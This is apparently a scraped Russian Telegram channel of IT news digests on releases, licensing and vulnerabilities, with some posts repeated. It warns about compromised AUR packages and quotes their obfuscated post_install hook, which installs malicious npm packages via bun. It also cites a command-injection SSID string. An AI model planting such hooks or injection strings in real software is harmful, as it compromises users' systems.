- Во FreeBSD устранено 4 уязвимости, позволяющие поднять привилегии, и одна удалённая root-уязвимость. Опять же, классика - отсутствие экранирования спецсимволов (и ведь пришло кому-то в голову точку доступа к вифи называть как "test `id`"!), use-after-free, отсутствие валидации и переполнения буферов. Обновляйтесь, в общем, все фиксы уже доступны к накатыванию.
Также у меня появился канал в MAX, присоединяйтесь!
👍4
2/2
Но хватит про очень плохое:
- Проект PHP перешёл на лицензию BSD-3 и изъял из обращения лицензию PHP License. Теперь можно спокойно использовать “PHP” где угодно, возрадуйтесь! Ну или нет ¯⧹_(ツ)_⧸¯.
- Доменная зона DE на несколько часов была выведена из строя из-за DNSSEC. Похожее было и с .ru в январе 2024 года. Еще одно напоминание о том, что криптография - это, конечно, хорошо, но требует очень аккуратного обращения.
- В Debian утверждена обязательная поддержка воспроизводимых сборок пакетов. Теперь если пользователь не может собрать бинарно идентичный пакет - он не будет принят в состав репозитория. Безусловно, это очень хорошо, особенно когда у нас через день что-то компрометируют и вставляют закладки.
- Новый reCAPTCHA не позволит пройти проверку на Android-устройствах без сервисов Google. Так как теперь все будет проходить через Play Integrity API, то всякие LineageOS без гуглосервисов не прокатят, а статус сертифицированного легко потерять при установке кастомной прошивки. Посмотрим, чем это все кончится.
- В Python 3.14.5 из-за утечек памяти возвращён старый сборщик мусора. И в 3.15 он не вернется. Ждем антидота от "укуса хромом", то есть от пожирания памяти.
- Adobe Lightroom CC при помощи AI адаптирован для работы в Linux через Wine. Адаптирован, конечно же, не адобой, а энтузиастами, которые циклично заставляли ИИшечку запускать оный в Wine, анализировать ошибки и дампы, писать заглушки или реализации необходимых функций, инжектить DLLки. С одной стороны - хорошее начинание, с другой - работать точно будет очень так себе в итоге. Когда же Adobe сделает нативные версии?
- Создан виртуальный музей операционных систем. Похоже, я знаю, на что я залипну в ближайшие выходные 😏 .
- Опубликован офисный пакет ONLYOFFICE 9.4 с обновлением лицензии на код. Теперь там плюс-минус все стандартно, фонд СПО может быть доволен, а европейские политики могут клепануть свой Euro-Office. Драма закончилась.
- Нарушение AGPL производителем 3D-принтеров Bambu Lab и создание форка Bambu Studio. Антитивоизация as it is - создали форк софта от Bambu для взаимодействия с их принтерами, только теперь под защитой фонда СПО, ибо нефиг. Есть подозрение, что Bambu Lab также прилетит хороший такой иск за нарушение AGPLv3, готовим попкорн.
Релизы дистров и ОСей: OmniOS CE r151058 (на технологиях OpenSolaris), ToaruOS 2.3 (самобытная Unix-подобная ОС), OpenWrt 25.12.3, Ubuntu Touch 24.04-1.3, AGL UCB 21.0 (база для автомобилей), Debian 12.14 и 13.5, OpenBSD 7.9, Proxmox VE 9.2, Ubuntu Core 26, RHEL 10.2 и RHEL 9.8, TileOS 2.0 (debian с тайловыми WM), MX Linux 25.2.
Также у меня появился канал в MAX, присоединяйтесь!
Но хватит про очень плохое:
- Проект PHP перешёл на лицензию BSD-3 и изъял из обращения лицензию PHP License. Теперь можно спокойно использовать “PHP” где угодно, возрадуйтесь! Ну или нет ¯⧹_(ツ)_⧸¯.
- Доменная зона DE на несколько часов была выведена из строя из-за DNSSEC. Похожее было и с .ru в январе 2024 года. Еще одно напоминание о том, что криптография - это, конечно, хорошо, но требует очень аккуратного обращения.
- В Debian утверждена обязательная поддержка воспроизводимых сборок пакетов. Теперь если пользователь не может собрать бинарно идентичный пакет - он не будет принят в состав репозитория. Безусловно, это очень хорошо, особенно когда у нас через день что-то компрометируют и вставляют закладки.
- Новый reCAPTCHA не позволит пройти проверку на Android-устройствах без сервисов Google. Так как теперь все будет проходить через Play Integrity API, то всякие LineageOS без гуглосервисов не прокатят, а статус сертифицированного легко потерять при установке кастомной прошивки. Посмотрим, чем это все кончится.
- В Python 3.14.5 из-за утечек памяти возвращён старый сборщик мусора. И в 3.15 он не вернется. Ждем антидота от "укуса хромом", то есть от пожирания памяти.
- Adobe Lightroom CC при помощи AI адаптирован для работы в Linux через Wine. Адаптирован, конечно же, не адобой, а энтузиастами, которые циклично заставляли ИИшечку запускать оный в Wine, анализировать ошибки и дампы, писать заглушки или реализации необходимых функций, инжектить DLLки. С одной стороны - хорошее начинание, с другой - работать точно будет очень так себе в итоге. Когда же Adobe сделает нативные версии?
- Создан виртуальный музей операционных систем. Похоже, я знаю, на что я залипну в ближайшие выходные 😏 .
- Опубликован офисный пакет ONLYOFFICE 9.4 с обновлением лицензии на код. Теперь там плюс-минус все стандартно, фонд СПО может быть доволен, а европейские политики могут клепануть свой Euro-Office. Драма закончилась.
- Нарушение AGPL производителем 3D-принтеров Bambu Lab и создание форка Bambu Studio. Антитивоизация as it is - создали форк софта от Bambu для взаимодействия с их принтерами, только теперь под защитой фонда СПО, ибо нефиг. Есть подозрение, что Bambu Lab также прилетит хороший такой иск за нарушение AGPLv3, готовим попкорн.
Релизы дистров и ОСей: OmniOS CE r151058 (на технологиях OpenSolaris), ToaruOS 2.3 (самобытная Unix-подобная ОС), OpenWrt 25.12.3, Ubuntu Touch 24.04-1.3, AGL UCB 21.0 (база для автомобилей), Debian 12.14 и 13.5, OpenBSD 7.9, Proxmox VE 9.2, Ubuntu Core 26, RHEL 10.2 и RHEL 9.8, TileOS 2.0 (debian с тайловыми WM), MX Linux 25.2.
Также у меня появился канал в MAX, присоединяйтесь!
👍4
Доброго времени суток!
Дайджест откладывается до следующей недели, работка - она такая, перегружает иногда.
Пока предлагаю поофигевать с того, что у majordomo какая-то проблема, виртуалочки немного прилегли (как минимум у меня). Сетевые проблемы, говорят в саппорте.
Дайджест откладывается до следующей недели, работка - она такая, перегружает иногда.
Пока предлагаю поофигевать с того, что у majordomo какая-то проблема, виртуалочки немного прилегли (как минимум у меня). Сетевые проблемы, говорят в саппорте.
🫡2
Доброго времени суток! Представляю вашему вниманию дайджест около-айтишных новостей за прошедшие 2 недели (26 мая - 7 июня).
Прошедшее время выдалось очень богатым на уязвимости, поэтому обновляйтесь как можно скорее. Лучше уж "не было печали - апдейтов накачали" и починиться за пару часов, чем ваши данные поимеют тем или иным способом.
- Расширение системной памяти через подкачку в видеопамяти NVIDIA. Если у вас есть дискретка от nVidia на ноутбуке и вы ей особо не пользуетесь, то вы можете через подкачку “расширить” размер доступной оперативки. Выглядит очень неплохо, если вам нужно много оперативки а она, скажем, распаяна.
- Немного приколов про использование ИИ: в jqwik добавлена скрытая деструктивная инструкция для AI-агентов, каталог GNOME Circle не будет принимать приложения, созданные с использованием AI, разработаны правила использования AI в проекте Rust, проблемы с соблюдением авторского права при переписывании ScanCode на Rust при помощи AI, Регрессии в rsync 3.4.3 и принятие изменений, подготовленных с использованием AI.
Подборка уязвимостей:
- Google случайно раскрыл детали неисправленной уязвимости в Chromium. Видимо, внутри гугля не смогли договориться, что это фича, а не баг, но на самом деле это оказалось багом. Ситуация забавная, пользователем хромого соболезную, ибо злоумышленники быстро возьмут это на вооружение.
- Уязвимости в Samba, допускающие удалённое выполнение кода в редких конфигурациях. Конфигурации-то редкие (использование скрипта для аутентификации и сервера печати), но баги стандартные - отсутствие экранирования спецсимволов. Не забудьте обновиться ASAP, если такое пользуете. Также там еще несколько уязвимостей устранили, включая DoS с помощью спецпакета UDP, так что не отмазывайтесь, а обновляйтесь.
- Уязвимости в Unbound, Kata-Containers, BIND, PostgreSQL, HPLIP, MongoDB, Rsync, 7-zip, Yelp, qSnapper и Suricata. Гонки, повышение привелегий, отсутствие валидации входящих данных, переполнение буфера, и, наверняка, use after free (в новости не написано). Классика жанра, обновляемся, если пользуете что-то из перечисленного.
- CIFSwitch - уязвимость в CIFS-подсистеме ядра Linux, позволяющая получить права root. Отсутствие валидации входящих данных. Пока что доступен только патч в ядро, нового релиза оного с фиксом пока нет.
- Макрософаг опять сделал РЕШЕТО - Fedora Linux помог выявить проблему с безопасностью в почтовом клиенте Outlook. Вкраце - аутглюк даже при установленной галке использования STARTTLS для POP3/IMAP его (STARTTLS) не использовал и соединение было нешифрованным. Известно о таком поведении как минимум начиная с Outlook 2007.
- Уязвимость в libinput, позволяющая повысить свои привилегии в системе. Угадайте, в чем дело? 1... 2... 3... И? Угадали! Отсутствует экранирование спецсимволов! Прототип эксплоита уже доступен, поэтому обновляйтесь как только соберут для вашего дистрибутива.
- Атака на реализации HTTP/2, приводящая к исчерпанию доступной памяти. Проблеме подвержены nginx, apache, IIS (который от макрософага), Envoy, Cloudflare Pingora. Там все просто - внутри сжатых заголовков ссылка на значение, которое пустое, но при обработке которого выделяется определенное количество байт в любом случае. Для apache есть фикс, но еще не зарелижен, IIS и Pingora пока не пофикшены, остальное уже зачинено.
- В Chrome устранено 429 уязвимостей, а в Android - 124. Там короче вообще жесть, а 3 проблемы даже сдали Qualcomm, так как косяки - они.
- Релизы дистров и ОСей: AlmaLinux 9.8 и 10.2, Rocky Linux 9.8 и 10.2, NixOS 26.05, Armbian 26.5, Ubuntu Sway Remix 26.04 LTS.
Также у меня появился канал в MAX, присоединяйтесь!
Прошедшее время выдалось очень богатым на уязвимости, поэтому обновляйтесь как можно скорее. Лучше уж "не было печали - апдейтов накачали" и починиться за пару часов, чем ваши данные поимеют тем или иным способом.
- Расширение системной памяти через подкачку в видеопамяти NVIDIA. Если у вас есть дискретка от nVidia на ноутбуке и вы ей особо не пользуетесь, то вы можете через подкачку “расширить” размер доступной оперативки. Выглядит очень неплохо, если вам нужно много оперативки а она, скажем, распаяна.
- Немного приколов про использование ИИ: в jqwik добавлена скрытая деструктивная инструкция для AI-агентов, каталог GNOME Circle не будет принимать приложения, созданные с использованием AI, разработаны правила использования AI в проекте Rust, проблемы с соблюдением авторского права при переписывании ScanCode на Rust при помощи AI, Регрессии в rsync 3.4.3 и принятие изменений, подготовленных с использованием AI.
Подборка уязвимостей:
- Google случайно раскрыл детали неисправленной уязвимости в Chromium. Видимо, внутри гугля не смогли договориться, что это фича, а не баг, но на самом деле это оказалось багом. Ситуация забавная, пользователем хромого соболезную, ибо злоумышленники быстро возьмут это на вооружение.
- Уязвимости в Samba, допускающие удалённое выполнение кода в редких конфигурациях. Конфигурации-то редкие (использование скрипта для аутентификации и сервера печати), но баги стандартные - отсутствие экранирования спецсимволов. Не забудьте обновиться ASAP, если такое пользуете. Также там еще несколько уязвимостей устранили, включая DoS с помощью спецпакета UDP, так что не отмазывайтесь, а обновляйтесь.
- Уязвимости в Unbound, Kata-Containers, BIND, PostgreSQL, HPLIP, MongoDB, Rsync, 7-zip, Yelp, qSnapper и Suricata. Гонки, повышение привелегий, отсутствие валидации входящих данных, переполнение буфера, и, наверняка, use after free (в новости не написано). Классика жанра, обновляемся, если пользуете что-то из перечисленного.
- CIFSwitch - уязвимость в CIFS-подсистеме ядра Linux, позволяющая получить права root. Отсутствие валидации входящих данных. Пока что доступен только патч в ядро, нового релиза оного с фиксом пока нет.
- Макрософаг опять сделал РЕШЕТО - Fedora Linux помог выявить проблему с безопасностью в почтовом клиенте Outlook. Вкраце - аутглюк даже при установленной галке использования STARTTLS для POP3/IMAP его (STARTTLS) не использовал и соединение было нешифрованным. Известно о таком поведении как минимум начиная с Outlook 2007.
- Уязвимость в libinput, позволяющая повысить свои привилегии в системе. Угадайте, в чем дело? 1... 2... 3... И? Угадали! Отсутствует экранирование спецсимволов! Прототип эксплоита уже доступен, поэтому обновляйтесь как только соберут для вашего дистрибутива.
- Атака на реализации HTTP/2, приводящая к исчерпанию доступной памяти. Проблеме подвержены nginx, apache, IIS (который от макрософага), Envoy, Cloudflare Pingora. Там все просто - внутри сжатых заголовков ссылка на значение, которое пустое, но при обработке которого выделяется определенное количество байт в любом случае. Для apache есть фикс, но еще не зарелижен, IIS и Pingora пока не пофикшены, остальное уже зачинено.
- В Chrome устранено 429 уязвимостей, а в Android - 124. Там короче вообще жесть, а 3 проблемы даже сдали Qualcomm, так как косяки - они.
- Релизы дистров и ОСей: AlmaLinux 9.8 и 10.2, Rocky Linux 9.8 и 10.2, NixOS 26.05, Armbian 26.5, Ubuntu Sway Remix 26.04 LTS.
Также у меня появился канал в MAX, присоединяйтесь!
Ради прикола попробовал в яндексовую Алису (с плюсом) запустить задачу: "напиши код на Go для обработки вебхуков от Vikunja и пересылки их в $MESSENGERNAME", где оные это тележенька, Макс, ntfy, mattermost, matrix, XMPP, nextcloud talk.
Результаты:
- Telegram: юзабельно
- Макс: нераспарсила что это и сгенерила какой-то рандомный отправщик в рандомный
- ntfy: юзабельно
- mattermost: юзабельно
- matrix: юзабельно
- XMPP: юзабельно
- nextcloud talk: юзабельно
Из спецэффектов: неправильная структура вебхука Vikunja, остальное выглядит вменяемо, для xmpp и matrix вполне нормально сформировала код отправки сообщений, используя правильные зависимости и структуру сообщения.
Скоро опусы с клавой станут не нужны? :)
Результаты:
- Telegram: юзабельно
- Макс: нераспарсила что это и сгенерила какой-то рандомный отправщик в рандомный
send-message какого-то com-домена.- ntfy: юзабельно
- mattermost: юзабельно
- matrix: юзабельно
- XMPP: юзабельно
- nextcloud talk: юзабельно
Из спецэффектов: неправильная структура вебхука Vikunja, остальное выглядит вменяемо, для xmpp и matrix вполне нормально сформировала код отправки сообщений, используя правильные зависимости и структуру сообщения.
Скоро опусы с клавой станут не нужны? :)
В списке рассылки AUR (Arch User Repository) идет активное обсуждение вредоносных коммитов, которые устанавливают в зависимости сборки - bun (js рантайм типа nodejs) и в postinstall скрипт вставляют установку вредоносов (типа пакетов js-digest, lockfile-js). Пока что известно (из списка рассылки) о почте 1 тысяче затронутых пакетов (а скорее всего их намного больше), поэтому если будете обновляться - посмотрите в PKGBUILD, чтобы не подтянуть вредоноса себе в систему.
https://lists.archlinux.org/archives/list/aur-general@lists.archlinux.org/thread/FGXPCB3ZVCJIV7FX323SBAX2JHYB7ZS4/
https://lists.archlinux.org/archives/list/aur-general@lists.archlinux.org/thread/FGXPCB3ZVCJIV7FX323SBAX2JHYB7ZS4/
😢2🫡1
Computers were a mistake
В списке рассылки AUR (Arch User Repository) идет активное обсуждение вредоносных коммитов, которые устанавливают в зависимости сборки - bun (js рантайм типа nodejs) и в postinstall скрипт вставляют установку вредоносов (типа пакетов js-digest, lockfile-js).…
Продолжаем нести вести с полей - теперь там небольшая обфускация через конкатенацию строк все того же bun:
+++ b/htbrowser-bin-deps.install
@@ -0,0 +1,3 @@
+post_install() {
+ $'\x63'"d" "/"'t'"m"'p' && "b"'u''n' 'a'"d"'d'
$'\141\x6e''s'"i""-"$'\143''o''l''o''r'$'\x73'
'n'"e"'x'"t""f"'i''l''e''-''j''s'
+}
❤4
Computers were a mistake
В списке рассылки AUR (Arch User Repository) идет активное обсуждение вредоносных коммитов, которые устанавливают в зависимости сборки - bun (js рантайм типа nodejs) и в postinstall скрипт вставляют установку вредоносов (типа пакетов js-digest, lockfile-js).…
Регистрацию в AUR отключили для чистки (и возможно выработки методов защиты).
🔥4
Доброго времени суток! Представляю вашему вниманию дайджест около-айтишных новостей за прошедшую неделю (9 - 15 июня).
- Возрождение разработки Ubuntu MATE после ухода основателя проекта. Исошника для 26.04 не будет, но вы можете обновиться но "свеженький" MATE 1.28 через apt. Сейчас новая команда разработки дистра под руководством лидера Lubuntu разгребает ошибки.
- Альянс AOMedia объявил о стабилизации видеокодека AV2. Несмотря на внушительный список участников, в ближайшее время доступно будет только софтверный декодинг/энкодинг, поэтому бежать в новый формат смысла особого пока нет.
- Lets Encrypt ввёл запрет на выдачу сертификатов для стран под санкциями США. Уже в интернетах доступны размышления-скандалы по поводу Max, у которого уже отзывают серты, и что будет в принципе со всеми проектами из РФ. Попутно GlobalSign начал отзыв EV-сертификатов у компаний, находящихся под санкциями.
- Уязвимость в процессорах ARM, позволяющая обойти изоляцию виртуальных машин. Кратко - побег из курятника, то есть возможность из виртуалки записать данные в память хоста (ну а дальше все мы знаем - комбинируем уязвимости и вот у нас уже RCE из десятка оных). Затронуты всякие кортексы, неоверсы и олимпусы от nVidia. Патчи есть для ядра linux и Xen, но еще ни в один релиз патчи не вошли.
- Первый стабильный выпуск открытого офисного пакета Euro-Office. По сути пока это просто ребрендинг, но The Document Foundation уже пожурили их за продвижение макрософагского OOXML, а также за то, что назвались "первым открытым европейским офисным пакетом", ибо есть LibreOffice и OpenOffice.
- В Fedora выявлена подмена взломанного участника AI-агентом для продвижения сомнительных изменений. Тут прям драма в нескольких актах, почитайте, как злоумышленники могут подготавливать почву для своих козней. Более прекрасен, конечно же, факт разоблачения.
- Как я писал ранее, некие товарищи скомпрометировали 469 пакетов в репозитории AUR. Потом нашли еще некоторое количество пакетов. А сейчас зарегистрироваться там нельзя. Конечно же, количество пакетов, по ощущениям от переписки, превышает означенное число.
- Власти США предписали Anthropic приостановить доступ к AI-моделям Fable 5 и Mythos 5. Основная причина - модели могут искать уязвимости в софте. Однако, как заявляет Anthropic, другие модели, которые доступны сейчас, тоже могут это делать, и непонятно, почему ограничения коснулись конкретно их моделей. Пока они работают над восстановлением доступа с юридической стороны, можно попробовать взломать Пентагон с помощью Gemini
- Релиз ядра Linux 7.1. Из интересного: новый драйвер ntfsplus, первая стадия прекращения поддержки CPU i486, удаление старых Ethernet-адаптеров, протоколов и драйверов, удаление протоколов ISDN и AX.25, включение по умолчанию механизма Intel FRED, поддержка BPF-обработчиков в io_uring, оптимизация подсистемы подкачки, поддержка субпланировщиков в sched_ext, ввод/вывод в режиме zero-copy в драйвере ublk, ioctl-операция “shutdown” в Btrfs, динамическое переключение режима производительности в драйвере amd-pstate, поддержка xattr для Unix-сокетов.
- Релизы дистров и ОСей: Alpine Linux 3.24, GentleOS (с ретро GUI, для ОЧЕНЬ винтажных ПК), Proxmox Mail Gateway 9.1.
Также у меня появился канал в MAX, присоединяйтесь!
- Возрождение разработки Ubuntu MATE после ухода основателя проекта. Исошника для 26.04 не будет, но вы можете обновиться но "свеженький" MATE 1.28 через apt. Сейчас новая команда разработки дистра под руководством лидера Lubuntu разгребает ошибки.
- Альянс AOMedia объявил о стабилизации видеокодека AV2. Несмотря на внушительный список участников, в ближайшее время доступно будет только софтверный декодинг/энкодинг, поэтому бежать в новый формат смысла особого пока нет.
- Lets Encrypt ввёл запрет на выдачу сертификатов для стран под санкциями США. Уже в интернетах доступны размышления-скандалы по поводу Max, у которого уже отзывают серты, и что будет в принципе со всеми проектами из РФ. Попутно GlobalSign начал отзыв EV-сертификатов у компаний, находящихся под санкциями.
- Уязвимость в процессорах ARM, позволяющая обойти изоляцию виртуальных машин. Кратко - побег из курятника, то есть возможность из виртуалки записать данные в память хоста (ну а дальше все мы знаем - комбинируем уязвимости и вот у нас уже RCE из десятка оных). Затронуты всякие кортексы, неоверсы и олимпусы от nVidia. Патчи есть для ядра linux и Xen, но еще ни в один релиз патчи не вошли.
- Первый стабильный выпуск открытого офисного пакета Euro-Office. По сути пока это просто ребрендинг, но The Document Foundation уже пожурили их за продвижение макрософагского OOXML, а также за то, что назвались "первым открытым европейским офисным пакетом", ибо есть LibreOffice и OpenOffice.
- В Fedora выявлена подмена взломанного участника AI-агентом для продвижения сомнительных изменений. Тут прям драма в нескольких актах, почитайте, как злоумышленники могут подготавливать почву для своих козней. Более прекрасен, конечно же, факт разоблачения.
- Как я писал ранее, некие товарищи скомпрометировали 469 пакетов в репозитории AUR. Потом нашли еще некоторое количество пакетов. А сейчас зарегистрироваться там нельзя. Конечно же, количество пакетов, по ощущениям от переписки, превышает означенное число.
- Власти США предписали Anthropic приостановить доступ к AI-моделям Fable 5 и Mythos 5. Основная причина - модели могут искать уязвимости в софте. Однако, как заявляет Anthropic, другие модели, которые доступны сейчас, тоже могут это делать, и непонятно, почему ограничения коснулись конкретно их моделей. Пока они работают над восстановлением доступа с юридической стороны, можно попробовать взломать Пентагон с помощью Gemini
¯\_(ツ)_⧸¯.- Релиз ядра Linux 7.1. Из интересного: новый драйвер ntfsplus, первая стадия прекращения поддержки CPU i486, удаление старых Ethernet-адаптеров, протоколов и драйверов, удаление протоколов ISDN и AX.25, включение по умолчанию механизма Intel FRED, поддержка BPF-обработчиков в io_uring, оптимизация подсистемы подкачки, поддержка субпланировщиков в sched_ext, ввод/вывод в режиме zero-copy в драйвере ublk, ioctl-операция “shutdown” в Btrfs, динамическое переключение режима производительности в драйвере amd-pstate, поддержка xattr для Unix-сокетов.
- Релизы дистров и ОСей: Alpine Linux 3.24, GentleOS (с ретро GUI, для ОЧЕНЬ винтажных ПК), Proxmox Mail Gateway 9.1.
Также у меня появился канал в MAX, присоединяйтесь!
👍3